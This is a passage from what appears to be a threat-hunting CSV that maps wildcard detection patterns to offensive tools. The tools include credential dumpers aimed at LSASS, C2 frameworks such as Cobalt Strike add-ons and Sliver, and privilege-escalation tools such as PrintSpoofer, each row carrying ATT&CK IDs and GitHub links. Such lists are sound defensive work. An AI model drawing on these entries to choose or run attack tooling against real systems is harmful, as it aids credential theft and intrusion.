PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","10","10","131","24","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z" +"*ppldump_embedded*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" +"*PPLdump64.exe*","offensive_tool_keyword","ppldump","Dump the memory of a PPL with a userland exploit","T1003 - T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/itm4n/PPLdump","1","1","N/A","N/A","8","774","137","2022-07-24T14:03:14Z","2021-04-07T13:12:47Z" +"*PPLdumpDll*","offensive_tool_keyword","ppldump","Dump the memory of a PPL with a userland exploit","T1003 - T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/itm4n/PPLdump","1","1","N/A","N/A","8","774","137","2022-07-24T14:03:14Z","2021-04-07T13:12:47Z" +"*PPLFault.*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*pplfault.cna*","offensive_tool_keyword","cobaltstrike","Takes the original PPLFault and the original included DumpShellcode and combinds it all into a BOF targeting cobalt strike.","T1055 - T1078.003","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/PPLFaultDumpBOF","1","1","N/A","N/A","2","115","11","2023-05-17T12:57:20Z","2023-05-16T13:02:22Z" +"*PPLFault.exe*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*PPLFaultDumpBOF*","offensive_tool_keyword","cobaltstrike","Takes the original PPLFault and the original included DumpShellcode and combinds it all into a BOF targeting cobalt strike.","T1055 - T1078.003","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/PPLFaultDumpBOF","1","1","N/A","N/A","2","115","11","2023-05-17T12:57:20Z","2023-05-16T13:02:22Z" +"*PPLFault-Localhost-SMB.ps1*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*PPLFaultPayload.dll*","offensive_tool_keyword","cobaltstrike","Takes the original PPLFault and the original included DumpShellcode and combinds it all into a BOF targeting cobalt strike.","T1055 - T1078.003","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/PPLFaultDumpBOF","1","1","N/A","N/A","2","115","11","2023-05-17T12:57:20Z","2023-05-16T13:02:22Z" +"*PPLFaultPayload.dll*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*PPLFaultTemp*","offensive_tool_keyword","cobaltstrike","Takes the original PPLFault and the original included DumpShellcode and combinds it all into a BOF targeting cobalt strike.","T1055 - T1078.003","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/PPLFaultDumpBOF","1","1","N/A","N/A","2","115","11","2023-05-17T12:57:20Z","2023-05-16T13:02:22Z" +"*PPLFaultTemp*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*PPLKiller.exe*","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","1","N/A","10","8","745","127","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z" +"*PPLKiller.sln*","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","1","N/A","10","8","745","127","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z" +"*PPLKiller.vcxproj*","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","1","N/A","10","8","745","127","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z" +"*PPLKiller-master*","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","1","N/A","10","8","745","127","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z" +"*PppEWCIgXbsepIwnuRIHtQLC*","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","1","N/A","10","10","759","254","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z" +"*ppypykatz.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*praetorian.antihacker*","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/praetorian-inc/PortBender","1","1","N/A","10","10","591","104","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z" +"*praetorian-inc/gato*","offensive_tool_keyword","gato","GitHub Self-Hosted Runner Enumeration and Attack Tool","T1083 - T1087 - T1081","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/praetorian-inc/gato","1","1","N/A","N/A","3","263","24","2023-07-27T15:15:32Z","2023-01-06T15:43:27Z" +"*praetorian-inc/noseyparker*","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","8","10","1169","56","2023-09-25T21:13:22Z","2022-11-08T23:09:17Z" +"*praetorian-inc/PortBender*","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/praetorian-inc/PortBender","1","1","N/A","10","10","591","104","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z" +"*pre2k auth * --dc-ip *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*prepare_ppl_command_line*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*prepareResponseForHiddenAPICall*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*PrimusC2-main.zip*","offensive_tool_keyword","primusC2","another C2 framework","T1090 - T1071","TA0011 - TA0002","N/A","N/A","C2","https://github.com/Primusinterp/PrimusC2","1","1","N/A","10","10","42","4","2023-08-21T04:05:48Z","2023-04-19T10:59:30Z" +"*print_shtinkering_crash_location*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*printerbug.py *:*@* *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*PrinterNotifyPotato *","offensive_tool_keyword","DCOMPotato","Service DCOM Object and SeImpersonatePrivilege abuse.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/DCOMPotato","1","0","N/A","10","4","326","46","2022-12-09T01:57:53Z","2022-12-08T14:56:13Z" +"*PrinterNotifyPotato.*","offensive_tool_keyword","DCOMPotato","Service DCOM Object and SeImpersonatePrivilege abuse.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/DCOMPotato","1","1","N/A","10","4","326","46","2022-12-09T01:57:53Z","2022-12-08T14:56:13Z" +"*PrintNightmare.*","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","0","N/A","N/A","6","533","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" +"*printnightmare_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*printspoofer -Command*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" +"*PrintSpoofer-*","offensive_tool_keyword","cobaltstrike","Reflection dll implementation of PrintSpoofer used in conjunction with Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crisprss/PrintSpoofer","1","1","N/A","10","10","76","8","2021-10-07T17:45:00Z","2021-10-07T17:28:45Z" +"*PrintSpoofer.*","offensive_tool_keyword","cobaltstrike","Reflection dll implementation of PrintSpoofer used in conjunction with Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crisprss/PrintSpoofer","1","1","N/A","10","10","76","8","2021-10-07T17:45:00Z","2021-10-07T17:28:45Z" +"*PrintSpoofer.cpp*","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" +"*PrintSpoofer.cpp*","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","0","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" +"*PrintSpoofer.exe*","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" +"*printspoofer.exe*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" +"*printspoofer.py*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" +"*PrintSpoofer.sln*","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" +"*PrintSpoofer_x64.exe*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" +"*PrintSpoofer32.exe*","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" +"*PrintSpoofer32.exe*","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" +"*PrintSpoofer64.exe*","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" +"*PrintSpoofer64.exe*","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" +"*PrintSpoofer-master*","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" +"*PrintSpoofer-master*","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" +"*Priv Esc Check Bof*","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","3","265","35","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" +"*priv/priv_windows.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*privcheck.cna*","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","3","265","35","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" +"*privcheck32*","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","1","N/A","9","3","265","35","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" +"*PrivEditor.dll*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" +"*Privesc.psm1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Privesc.tests.ps1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*privesc_checker*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*privesc_checker.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*privesc_juicy_potato.py*","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1100 - T1059 - T1505","TA0002 - TA0003 - TA0004","N/A","N/A","Web Attacks","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","9","809","144","2023-09-27T08:48:31Z","2019-03-10T22:09:40Z" +"*privesc_powerup.py*","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1100 - T1059 - T1505","TA0002 - 